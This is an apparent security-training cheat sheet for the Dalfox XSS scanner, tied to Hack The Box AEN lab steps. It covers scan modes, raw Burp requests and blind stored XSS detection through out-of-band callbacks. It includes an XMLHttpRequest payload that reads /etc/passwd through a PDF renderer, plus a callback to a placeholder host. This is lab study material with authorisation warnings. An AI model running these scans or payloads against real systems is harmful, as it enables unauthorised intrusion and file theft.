daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

dalfox.md (26878B)


      1 ---
      2 title: "Dalfox"
      3 description: "Dalfox XSS scanner usage for HTB and AEN: scan modes, pipelines, custom payloads, blind XSS and output handling."
      4 category: web
      5 tags: ["web", "xss"]
      6 tools: []
      7 difficulty: intermediate
      8 updated: "2026-08-28"
      9 source: "vault:Web/Dalfox - HTB and AEN Cheat Sheet.md"
     10 ---
     11 # Dalfox — HTB and AEN Cheat Sheet
     12 
     13 ## Summary
     14 
     15 [Dalfox](https://github.com/hahwul/dalfox) automates XSS parameter discovery, reflection analysis, context-aware payload selection, DOM/AST analysis, and proof-of-concept generation. In AEN Note 5 its strongest fit is **Step 7**, where an authenticated support-ticket submission stores input that an administrator later renders. Capture the real ticket request in Burp, give Dalfox that raw request, restrict the scan, and use an out-of-band callback to detect the delayed execution. Dalfox is **not** the validator for Step 8's server-side PDF local-file-read chain; that requires the staged manual renderer tests in the dedicated Step 8 sheet.
     16 
     17 > [!danger]+ Authorisation and Impact Boundary
     18 >
     19 > 1. Use these commands only in HTB, an intentionally vulnerable lab, or an explicitly authorised engagement.
     20 > 2. XSS scanning sends executable markup and can create persistent records. Start with one target, low concurrency, and a harmless proof.
     21 > 3. A blind callback proves code execution and outbound reachability. It does not require collecting cookies, page contents, credentials, or other victim data.
     22 > 4. Do not scan logout, delete, purchase, administration, or other state-changing endpoints unless the test plan specifically permits them.
     23 > 5. Remove stored test records and callback data when the exercise ends.
     24 
     25 > [!tip]+ Related Notes
     26 >
     27 > 1. AEN source: 5 - Web Application Enumeration#Step 7 — support.inlanefreight.local (Blind XSS → Session Hijack)
     28 > 2. AEN Step 7 explanation: Step 7 - Blind XSS Session Hijack Cheat Sheet
     29 > 3. General XSS workflow: Cross-Site Scripting (XSS) - HTB Cheat Sheet
     30 > 4. Blind-XSS operations: Blind XSS to Session Hijacking - HTB Cheat Sheet
     31 > 5. Step 8 renderer chain: Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet
     32 
     33 ---
     34 
     35 ## 1. What Dalfox Does
     36 
     37 ### Pipeline in Plain Language
     38 
     39 | Stage | Dalfox action | What the operator learns |
     40 |---|---|---|
     41 | Input parsing | Reads a URL, URL list, pipe, raw HTTP request, or HAR | Exactly which requests will be tested |
     42 | Discovery | Extracts query/body/header/cookie inputs | Where controlled data can enter |
     43 | Parameter mining | Looks for additional likely parameters | Inputs not obvious in the visible form |
     44 | Probe | Inserts markers and special characters | Which values reflect and what survives |
     45 | Context analysis | Identifies HTML, attribute, script, or DOM context | Which payload family fits the parser |
     46 | Verification | Tests execution signals and analyses JavaScript/DOM | Whether the result is more than inert reflection |
     47 | Reporting | Produces PoCs and structured output | Reproducible evidence for manual confirmation |
     48 
     49 > [!important]+ Scanner Result Is the Start of Verification
     50 >
     51 > A reflected marker is not automatically XSS. Reproduce the smallest reported case in Burp or a browser, confirm where the value lands, and distinguish HTML injection, JavaScript execution, and actual impact.
     52 
     53 ### Finding Labels
     54 
     55 | Label | Meaning | Operator response |
     56 |---|---|---|
     57 | `V` | Vulnerable: the returned DOM parses with the payload in an executable position | Reproduce in a real browser and record the exact context |
     58 | `A` | AST analysis found a JavaScript source-to-sink path | Inspect and exercise the client-side data flow manually |
     59 | `R` | Reflected value | Determine whether encoding/context prevents execution |
     60 | `I` | Informational observation | Use it to guide testing; do not report it as XSS alone |
     61 
     62 ---
     63 
     64 ## 2. Install and Confirm the CLI
     65 
     66 This sheet targets the **Dalfox v3** command layout. Older v2 tutorials use commands such as `dalfox url`, `dalfox file`, and `dalfox pipe`; v3 puts these inputs under `dalfox scan`.
     67 
     68 ### macOS
     69 
     70 ```bash
     71 brew install dalfox
     72 dalfox --version
     73 dalfox scan --help
     74 ```
     75 
     76 Expected result: the version command prints the installed build, and the scan help lists URL/file/pipe/raw-HTTP/HAR inputs. Version text varies by release.
     77 
     78 ### Cargo Alternative
     79 
     80 ```bash
     81 cargo install dalfox
     82 dalfox --version
     83 ```
     84 
     85 ### Quick Command Map
     86 
     87 ```bash
     88 dalfox --help
     89 dalfox scan --help
     90 dalfox payload --help
     91 dalfox payload blind
     92 ```
     93 
     94 | Command | Purpose |
     95 |---|---|
     96 | `dalfox scan ...` | Scan one or more HTTP requests for XSS |
     97 | `dalfox payload ...` | Print payload families without scanning a target |
     98 | `dalfox payload blind` | Show blind-XSS payload skeletons; `{}` represents the callback location |
     99 | `dalfox server ...` | Run Dalfox as a service for integrations |
    100 | `dalfox mcp ...` | Expose supported functionality through MCP |
    101 
    102 ---
    103 
    104 ## 3. Choose the Right Input Shape
    105 
    106 ### Decision Table
    107 
    108 | Starting material | Use | Why |
    109 |---|---|---|
    110 | One public GET URL | `--input-type url` | Fastest path for a simple query parameter |
    111 | List of URLs | `dalfox scan urls.txt` | Batch mode with automatic file detection |
    112 | Pipeline output | `... \| dalfox scan` | Consumes URLs generated by another tool |
    113 | Authenticated POST from Burp | `--input-type raw-http` | Preserves cookies, CSRF token, method, body, and headers |
    114 | Browser session/export | HAR input | Retains multiple captured browser requests |
    115 | Blind stored form | Raw HTTP plus `--blind-oob` or `-b` | Injection and observation happen at different times |
    116 
    117 ### Simple GET Discovery
    118 
    119 First inspect how Dalfox interprets the target without running the full payload scan:
    120 
    121 ```bash
    122 dalfox scan --input-type url 'http://lab.local/search?q=aen-marker' --dry-run
    123 ```
    124 
    125 Then scan the known query parameter conservatively:
    126 
    127 ```bash
    128 dalfox scan --input-type url 'http://lab.local/search?q=aen-marker' \
    129   -p q:query \
    130   --workers 2 \
    131   -r 2 \
    132   --only-poc v \
    133   --poc-type http-request
    134 ```
    135 
    136 Expected result: Dalfox tests `q`, reports reflection/context information, and prints a proof only if it reaches the selected verified class. No finding is also a valid result; inspect whether authentication, context, or client-side rendering was missed.
    137 
    138 ### Direct Form POST
    139 
    140 ```bash
    141 dalfox scan --input-type url 'http://lab.local/comment' \
    142   -X POST \
    143   -H 'Content-Type: application/x-www-form-urlencoded' \
    144   -d 'message=aen-marker' \
    145   -p message:body \
    146   --workers 1 \
    147   -r 1
    148 ```
    149 
    150 | Fragment | Meaning |
    151 |---|---|
    152 | `-X POST` | Uses the same HTTP method as the form |
    153 | `-d ...` | Supplies the form-encoded body |
    154 | `message:body` | Restricts injection to the body field named `message` |
    155 | `--workers 1` | Sends one worker's requests at a time |
    156 | `-r 1` | Caps the request rate at one per second |
    157 
    158 > [!warning]+ Do Not Guess Form Field Names
    159 >
    160 > The AEN page label is **Message**, but the underlying POST name is not shown in Note 5. Inspect the captured request. If it is `content=...`, use `content:body`; if it is `msg=...`, use `msg:body`. The visible label and HTTP name do not have to match.
    161 
    162 ---
    163 
    164 ## 4. Raw HTTP from Burp
    165 
    166 Raw HTTP is the most reliable option for authenticated HTB forms.
    167 
    168 ### Capture Procedure
    169 
    170 1. Submit one normal, harmless ticket in the browser while Burp Proxy is recording.
    171 2. Find the corresponding POST request in **HTTP history**.
    172 3. Confirm it contains the expected host, path, cookie, content type, CSRF value, and form body.
    173 4. Save the **request message only** as `support-ticket.txt` in a clean lab directory.
    174 5. Replace real secrets in study notes, but keep the live lab file complete while testing.
    175 6. Run the dry check below before active scanning.
    176 
    177 Illustrative structure—the real request is authoritative:
    178 
    179 ```http
    180 POST /ticket.php HTTP/1.1
    181 Host: support.inlanefreight.local
    182 Cookie: session=REDACTED_LAB_SESSION
    183 Content-Type: application/x-www-form-urlencoded
    184 Connection: close
    185 
    186 subject=aen-dalfox&ACTUAL_MESSAGE_PARAMETER=normal-test-message
    187 ```
    188 
    189 ```bash
    190 dalfox scan --input-type raw-http support-ticket.txt --dry-run
    191 ```
    192 
    193 Expected result: Dalfox recognises one POST request and its body parameters. `--dry-run` validates the planned input; it does not prove XSS.
    194 
    195 ### Restrict to One Known Parameter
    196 
    197 After reading the raw body, optionally narrow the scan:
    198 
    199 ```bash
    200 dalfox scan --input-type raw-http support-ticket.txt \
    201   -p ACTUAL_MESSAGE_PARAMETER:body \
    202   --workers 1 \
    203   -r 1
    204 ```
    205 
    206 If the name is still uncertain, omit `-p` and allow discovery, then use the output to choose the real parameter for the next run.
    207 
    208 ### Through Burp for Visibility
    209 
    210 ```bash
    211 dalfox scan --input-type raw-http support-ticket.txt \
    212   --proxy http://127.0.0.1:8080 \
    213   --workers 1 \
    214   -r 1
    215 ```
    216 
    217 This routes Dalfox traffic through Burp so each generated request can be inspected. Ensure Burp's listener is on `127.0.0.1:8080` and avoid intercepting every request unless you intend to step through them manually.
    218 
    219 > [!failure]+ Raw Request Fails but Browser Works
    220 >
    221 > 1. Refresh expired cookies and CSRF tokens.
    222 > 2. Verify the `Host` header resolves to the HTB target.
    223 > 3. Preserve the original body encoding: form, JSON, or multipart.
    224 > 4. Check whether the application requires a preceding request or one-time token.
    225 > 5. Compare Dalfox traffic with a working browser request in Burp before changing payload flags.
    226 
    227 ---
    228 
    229 ## 5. AEN Step 7 — Blind Stored XSS
    230 
    231 ### Why Normal Scanning Is Not Enough
    232 
    233 The vulnerable support ticket is rendered later by an administrator or automated agent. The submission response cannot show the privileged DOM, so immediate reflection analysis may report little or nothing. The useful signal is a unique outbound callback created when the stored record is viewed.
    234 
    235 <figure class="flow plate corners">
    236 <figcaption class="flow__cap"><span class="flow__kind">Blind stored XSS chain</span><span class="flow__dir">LR</span></figcaption>
    237 <div class="flow__body">
    238 <div class="flow__diagram" data-dir="lr">
    239 <div class="flow-rank"><div class="flow-node is-entry">Burp captures normal ticket POST</div></div>
    240 <div class="flow-edge"></div>
    241 <div class="flow-rank"><div class="flow-node">Dalfox injects blind canary</div></div>
    242 <div class="flow-edge"></div>
    243 <div class="flow-rank"><div class="flow-node">Support app stores ticket</div></div>
    244 <div class="flow-edge"></div>
    245 <div class="flow-rank"><div class="flow-node">Admin agent opens ticket later</div></div>
    246 <div class="flow-edge"></div>
    247 <div class="flow-rank"><div class="flow-node">Payload requests unique OOB address</div></div>
    248 <div class="flow-edge"></div>
    249 <div class="flow-rank"><div class="flow-node is-goal">Callback proves execution and reachability</div></div>
    250 </div>
    251 </div>
    252 </figure>
    253 
    254 ### Option A — Dalfox-Managed OOB Check
    255 
    256 ```bash
    257 dalfox scan --input-type raw-http support-ticket.txt \
    258   --blind-oob \
    259   --blind-oob-wait 120 \
    260   --workers 1 \
    261   -r 1 \
    262   -f json \
    263   -o support-dalfox.json \
    264   --include-request
    265 ```
    266 
    267 Line-by-line:
    268 
    269 1. `--input-type raw-http` replays the authenticated form shape captured in Burp.
    270 2. `--blind-oob` creates out-of-band payloads and monitors the default OOB service.
    271 3. `--blind-oob-wait 120` keeps polling for two minutes after injection.
    272 4. One worker and one request per second limit duplicate stored tickets and load.
    273 5. JSON output preserves machine-readable evidence; `--include-request` records the triggering request.
    274 
    275 Expected result after the support agent views the ticket: an OOB interaction correlated to a Dalfox payload. If the agent does not view the record within 120 seconds, the scan may end without a reported interaction even though the ticket remains stored.
    276 
    277 > [!warning]+ Delayed Review Can Outlive the Scan
    278 >
    279 > The `--blind-oob-wait` value is only the post-scan polling window. A ticket opened ten minutes later needs a persistent collector whose logs remain available; increasing the wait indefinitely is not a substitute for planning the asynchronous workflow.
    280 
    281 ### Option B — Persistent Callback You Control
    282 
    283 ```bash
    284 dalfox scan --input-type raw-http support-ticket.txt \
    285   -b 'https://UNIQUE-ID.YOUR-AUTHORISED-CALLBACK.example' \
    286   --workers 1 \
    287   -r 1 \
    288   -f json \
    289   -o support-blind.json \
    290   --include-request
    291 ```
    292 
    293 Use an Interactsh, Burp Collaborator, or self-hosted lab endpoint that remains observable after Dalfox exits. Give every run a unique subdomain/path so a late callback can be tied to one field and timestamp.
    294 
    295 ### Why `--sxss` Is Not the First AEN Choice
    296 
    297 Dalfox's stored-XSS mode can submit to one endpoint and revisit a retrieval page:
    298 
    299 ```bash
    300 dalfox scan --input-type url 'https://lab.local/post-comment' \
    301   --sxss \
    302   --sxss-url 'https://lab.local/comments'
    303 ```
    304 
    305 This works only when Dalfox can access the page that renders the stored value. In AEN Step 7 the important renderer is the admin ticket view, which is unavailable before session compromise. Therefore:
    306 
    307 1. Use blind OOB detection first.
    308 2. Treat the callback as the XSS proof.
    309 3. Keep AEN's later session-impact demonstration manual and separate.
    310 4. Do not call a missing `--sxss` result evidence that the ticket is safe.
    311 
    312 ### AEN Evidence Ladder
    313 
    314 | Observation | What it proves | What it does not prove |
    315 |---|---|---|
    316 | Ticket submission succeeds | Input reached storage workflow | The admin page rendered it |
    317 | Dalfox reports reflection only | Value appeared in an immediate response | JavaScript execution in admin context |
    318 | Unique HTTP/DNS callback | Stored payload was processed and could reach OOB service | Cookie access or admin identity by itself |
    319 | Callback user agent/source matches support agent | Stronger execution-context correlation | Session theft or account takeover |
    320 | Manual minimal admin action after authorised replay | Session impact | Password compromise or persistence |
    321 
    322 ### Safe First Proof Versus AEN Escalation
    323 
    324 Dalfox should first produce only an OOB execution canary. AEN's later `document.cookie` collection is a separate impact step documented in Step 7 - Blind XSS Session Hijack Cheat Sheet. Do not make sensitive collection the scanner's default: `HttpOnly` may correctly prevent reading the cookie, and XSS is still real even when no cookie is exposed.
    325 
    326 ---
    327 
    328 ## 6. AEN Step 8 — Dalfox Boundary
    329 
    330 Step 8 injects HTML/JavaScript into a **server-side PDF renderer** and uses that renderer's local privileges to request `file:///etc/passwd`. This differs from ordinary reflected or stored browser XSS.
    331 
    332 | Question | Step 7 support ticket | Step 8 tracking PDF |
    333 |---|---|---|
    334 | Who parses the input? | Admin/support browser | Server-side HTML-to-PDF worker |
    335 | Where is output observed? | OOB callback and admin page | Generated PDF |
    336 | Useful Dalfox mode | Raw HTTP plus blind OOB | At most input/reflection discovery |
    337 | Reliable proof | Unique callback | Visible staged renderer output |
    338 | Can Dalfox prove local file read? | Not applicable | No; inspect the generated PDF manually |
    339 
    340 > [!important]+ Correct Tool Choice
    341 >
    342 > Dalfox may help locate a reflected tracking parameter, but it does not model the PDF generation/retrieval workflow or validate `file://` content inside the generated artifact. Follow Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet: visible text/HTML first, harmless JavaScript second, then the authorised local-file request. Do not interpret “Dalfox found no XSS” as evidence that the renderer chain is safe.
    343 
    344 The AEN payload:
    345 
    346 ```html
    347 <script>
    348 x = new XMLHttpRequest;
    349 x.onload = function () {
    350   document.write(this.responseText)
    351 };
    352 x.open("GET", "file:///etc/passwd");
    353 x.send();
    354 </script>
    355 ```
    356 
    357 belongs in the tracking form field, not in Dalfox or a terminal. It creates a request **inside the PDF worker**, waits for the response, and writes that response into the rendered document. The important security assumption is the renderer's ability to access the `file://` scheme; a normal browser commonly blocks this cross-origin access.
    358 
    359 ---
    360 
    361 ## 7. AEN Note 5 Applicability Matrix
    362 
    363 | AEN section | Main vulnerability class | Dalfox fit | Correct use or handoff |
    364 |---|---|---|---|
    365 | Initial vhost/screenshot triage | Asset discovery | Low | Use EyeWitness/gowitness; give Dalfox selected HTTP inputs later |
    366 | Shop object access | IDOR | None | Compare object IDs and authorisation responses manually |
    367 | Development upload | Verb tampering/file upload | None | Test methods, content controls, storage, and execution separately |
    368 | Helpdesk | LFI | None | Use controlled path traversal/file-read tests |
    369 | Status application | SQL injection | None | Use Burp/manual SQLi and sqlmap when justified |
    370 | **Support Step 7** | **Blind stored XSS** | **High** | Raw authenticated POST plus OOB callback |
    371 | **Tracking Step 8** | **PDF HTML injection → SSRF/file read** | **Limited** | Discovery only; validate generated PDF manually |
    372 | VPN portal | Product/version/dead end | None | Fingerprint and move on when no supported path exists |
    373 | External application | XXE | None | Use XML parser/entity testing |
    374 | GitLab | Misconfiguration | None | Enumerate application configuration and access controls |
    375 | Monitoring | Command injection | None | Use one-change shell-metacharacter probes and manual verification |
    376 
    377 This matrix prevents a common mistake: choosing a scanner first and forcing every application into its vulnerability model. In Note 5, Dalfox is a specialist for the support XSS, not the general web-enumeration engine.
    378 
    379 ---
    380 
    381 ## 8. Parameters and Scope Controls
    382 
    383 ### Parameter Locations
    384 
    385 ```bash
    386 -p q:query
    387 -p message:body
    388 -p profile:json
    389 -p session:cookie
    390 -p X-Forwarded-For:header
    391 ```
    392 
    393 Supported locations include query strings, bodies, JSON, multipart fields, cookies, and headers. Use the location suffix when the same name could appear in more than one place.
    394 
    395 ### Restrict Noise
    396 
    397 ```bash
    398 dalfox scan urls.txt \
    399   --include-url 'support\.inlanefreight\.local' \
    400   --exclude-url '/logout|/delete|/admin/action' \
    401   --ignore-param 'csrf,submit' \
    402   --workers 2 \
    403   --max-concurrent-targets 1 \
    404   -r 2 \
    405   --delay 500
    406 ```
    407 
    408 | Flag | Effect |
    409 |---|---|
    410 | `--include-url` | Keeps only matching target URLs |
    411 | `--exclude-url` | Removes dangerous or irrelevant paths |
    412 | `--ignore-param` | Does not inject into listed parameters |
    413 | `--workers` | Limits concurrent workers within a target |
    414 | `--max-concurrent-targets` | Limits simultaneous targets |
    415 | `-r` | Requests per second ceiling |
    416 | `--delay` | Adds time between requests |
    417 
    418 ### Discovery Controls
    419 
    420 | Flag | Use when |
    421 |---|---|
    422 | `--dry-run` | Confirm input interpretation before scanning |
    423 | `--only-discovery` | Map parameters/reflections without the normal exploitation phase |
    424 | `--skip-discovery` | Parameters are already known and you want direct testing |
    425 | `--skip-mining` | Avoid additional parameter guessing |
    426 | `--deep-scan` | A normal authorised scan missed a complex context; expect more requests |
    427 | `--hpp` | Testing HTTP parameter pollution is explicitly in scope |
    428 
    429 ---
    430 
    431 ## 9. Payload Strategy and PayloadsAllTheThings
    432 
    433 ### Let Context Drive Payload Choice
    434 
    435 Dalfox's generated payloads account for the observed parsing context and encodings. Useful controls include:
    436 
    437 ```bash
    438 dalfox scan 'http://lab.local/search?q=aen-marker' \
    439   -p q:query \
    440   -e url,html
    441 ```
    442 
    443 Available encoders include `none`, `url`, repeated URL encoding, `html`, `htmlpad`, `base64`, `unicode`, and zero-width-space variants. More encoders create more traffic; use only those justified by the observed transform.
    444 
    445 ### Local PATT Quick List
    446 
    447 The local repository contains:
    448 
    449 ```text
    450 /Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt
    451 ```
    452 
    453 It currently contains 38 quick payload lines and is largely designed around visible `alert()`/`prompt()` proofs. Review it before use:
    454 
    455 ```bash
    456 sed -n '1,80p' '/Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt'
    457 ```
    458 
    459 Use it only on an interactive lab page where pop-ups and event-triggered payloads are acceptable:
    460 
    461 ```bash
    462 dalfox scan 'http://lab.local/search?q=aen-marker' \
    463   -p q:query \
    464   --custom-payload '/Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt' \
    465   --workers 1 \
    466   -r 1
    467 ```
    468 
    469 > [!warning]+ Why This Is Wrong for the AEN Ticket by Default
    470 >
    471 > A pop-up list creates many stored tickets, may interrupt the support agent, and does not provide reliable delayed correlation. For Step 7 use Dalfox's blind callback mode with one unique OOB identifier. Use PATT to understand candidate primitives, not as an unreviewed firehose.
    472 
    473 ### Built-In Remote Collections
    474 
    475 ```bash
    476 dalfox scan 'http://lab.local/search?q=aen-marker' \
    477   --remote-payloads portswigger,payloadbox
    478 ```
    479 
    480 This fetches supported remote sets; it is not a PATT integration. Record the source/version used so the test is reproducible, and apply the same scope/rate controls.
    481 
    482 ### Replace Rather Than Supplement
    483 
    484 ```bash
    485 dalfox scan 'http://lab.local/search?q=aen-marker' \
    486   --custom-payload reviewed-lab-payloads.txt \
    487   --only-custom-payload
    488 ```
    489 
    490 Without `--only-custom-payload`, custom lines supplement Dalfox's generated payloads. With it, only the reviewed file is used. This is useful when an engagement permits a narrowly approved payload set.
    491 
    492 ---
    493 
    494 ## 10. Output, Evidence, and Exit Codes
    495 
    496 ### Human-Readable Markdown
    497 
    498 ```bash
    499 dalfox scan --input-type raw-http request.txt \
    500   -f markdown \
    501   -o dalfox-findings.md \
    502   --include-request \
    503   --include-response \
    504   --poc-type http-request
    505 ```
    506 
    507 ### JSON for Later Review
    508 
    509 ```bash
    510 dalfox scan --input-type raw-http request.txt \
    511   -f json \
    512   -o dalfox-findings.json \
    513   --include-request
    514 ```
    515 
    516 Supported formats include plain text, JSON, JSONL, Markdown, SARIF, and TOML. Include response bodies only when needed because they may contain sessions, personal data, or large amounts of content.
    517 
    518 ### Exit-Code Meaning
    519 
    520 | Exit code | Meaning |
    521 |---|---|
    522 | `0` | Scan completed with no findings |
    523 | `1` | Findings were produced |
    524 | `2` | Dalfox encountered an error |
    525 
    526 An exit code of `1` is not a shell failure in the ordinary sense; it lets CI distinguish “finding present” from “no finding.” Always inspect the report before deciding severity.
    527 
    528 ### Evidence Checklist
    529 
    530 1. Dalfox version and exact command.
    531 2. Sanitised raw request shape and parameter location.
    532 3. Scope/rate settings.
    533 4. Finding label and generated proof.
    534 5. Manual reproduction in the correct browser/rendering context.
    535 6. For blind XSS: unique callback ID, protocol, timestamp, source, and user agent.
    536 7. A clear boundary between execution proof and impact proof.
    537 8. Cleanup of stored records, reports, sessions, and callback data.
    538 
    539 ---
    540 
    541 ## 11. Troubleshooting
    542 
    543 | Symptom | Likely cause | Next check |
    544 |---|---|---|
    545 | `dalfox: command not found` | Tool not installed or not on `PATH` | Install, then run `dalfox --version` |
    546 | Old tutorial command fails | v2 `url/file/pipe` syntax copied into v3 | Use `dalfox scan` and select/auto-detect input type |
    547 | Browser works, raw request gets `401/403` | Expired session/CSRF or missing header | Recapture a fresh working request in Burp |
    548 | Many parameters/noise | Discovery too broad | Add `-p`, `--ignore-param`, `--skip-mining`, and URL scope |
    549 | Reflection reported, browser does nothing | Value is encoded or lands in inert context | Inspect raw response and parsed DOM; reproduce the reported PoC |
    550 | No blind callback | Not viewed, syntax mismatch, CSP, egress block, or polling ended | Correlate ticket storage, use a persistent unique callback, then wait for the authorised viewer |
    551 | `--sxss` finds nothing in AEN | Retrieval URL is admin-only | Use blind OOB detection instead |
    552 | Step 8 scan is negative | PDF worker is outside Dalfox's normal verification model | Run the staged PDF-renderer procedure manually |
    553 | Scan overwhelms the lab | Defaults too concurrent for this workflow | Stop, reduce workers/targets/rate, and remove duplicate stored records |
    554 
    555 ---
    556 
    557 ## 12. Fast Runbooks
    558 
    559 ### Reflected GET XSS
    560 
    561 1. Start with a marker and inspect the response/DOM.
    562 2. Run `--dry-run`.
    563 3. Restrict to the known query parameter.
    564 4. Scan at a low rate.
    565 5. Reproduce only the smallest verified PoC.
    566 
    567 ```bash
    568 dalfox scan 'http://lab.local/search?q=aen-marker' \
    569   -p q:query \
    570   --workers 2 \
    571   -r 2 \
    572   --only-poc v \
    573   --poc-type http-request
    574 ```
    575 
    576 ### Authenticated Form
    577 
    578 1. Submit a normal form through Burp.
    579 2. Save the working request as raw HTTP.
    580 3. Confirm cookies, CSRF token, content type, and body.
    581 4. Dry-run, then restrict the actual input name.
    582 5. Proxy the scan through Burp if you need request-by-request visibility.
    583 
    584 ```bash
    585 dalfox scan --input-type raw-http request.txt \
    586   -p ACTUAL_PARAMETER:body \
    587   --proxy http://127.0.0.1:8080 \
    588   --workers 1 \
    589   -r 1
    590 ```
    591 
    592 ### AEN Step 7 Blind Ticket
    593 
    594 1. Capture one normal ticket POST.
    595 2. Keep the session/CSRF state fresh.
    596 3. Choose a unique, authorised OOB callback.
    597 4. Run one worker at one request per second.
    598 5. Keep the collector observable long enough for delayed admin review.
    599 6. Record the callback as execution proof.
    600 7. Follow the Step 7 sheet for separately authorised impact validation and cleanup.
    601 
    602 ```bash
    603 dalfox scan --input-type raw-http support-ticket.txt \
    604   -b 'https://UNIQUE-ID.YOUR-AUTHORISED-CALLBACK.example' \
    605   --workers 1 \
    606   -r 1 \
    607   -f json \
    608   -o support-blind.json \
    609   --include-request
    610 ```
    611 
    612 ---
    613 
    614 ## Lessons Learned
    615 
    616 1. Raw HTTP avoids inventing parameter names and preserves authenticated request state.
    617 2. Blind stored XSS is asynchronous; callback lifetime matters as much as payload syntax.
    618 3. `--sxss` needs an accessible retrieval page, which AEN's pre-compromise admin workflow does not provide.
    619 4. PATT expands payload knowledge, but Dalfox's context analysis should decide which syntax is worth testing.
    620 5. A negative Dalfox result does not cover server-side PDF rendering, SQLi, IDOR, LFI, XXE, upload flaws, or command injection.
    621 6. Reflection, execution, data access, and session impact are separate claims requiring separate evidence.
    622 
    623 ---
    624 
    625 ## References
    626 
    627 1. [Dalfox — Official GitHub Repository](https://github.com/hahwul/dalfox)
    628 2. [Dalfox — Installation](https://dalfox.hahwul.com/getting-started/installation/)
    629 3. [Dalfox — CLI Reference](https://dalfox.hahwul.com/reference/cli/)
    630 4. [Dalfox — Scanning Modes](https://dalfox.hahwul.com/guide/scanning-modes/)
    631 5. [Dalfox — Stored XSS](https://dalfox.hahwul.com/guide/stored-xss/)
    632 6. [Dalfox — Parameters](https://dalfox.hahwul.com/guide/parameters/)
    633 7. [Dalfox — Payloads](https://dalfox.hahwul.com/guide/payloads/)
    634 8. [Dalfox — Output](https://dalfox.hahwul.com/guide/output/)
    635 9. [PayloadsAllTheThings — XSS Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md)
    636 10. 5 - Web Application Enumeration#Step 7 — support.inlanefreight.local (Blind XSS → Session Hijack)
    637 11. Step 7 - Blind XSS Session Hijack Cheat Sheet
    638 12. Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet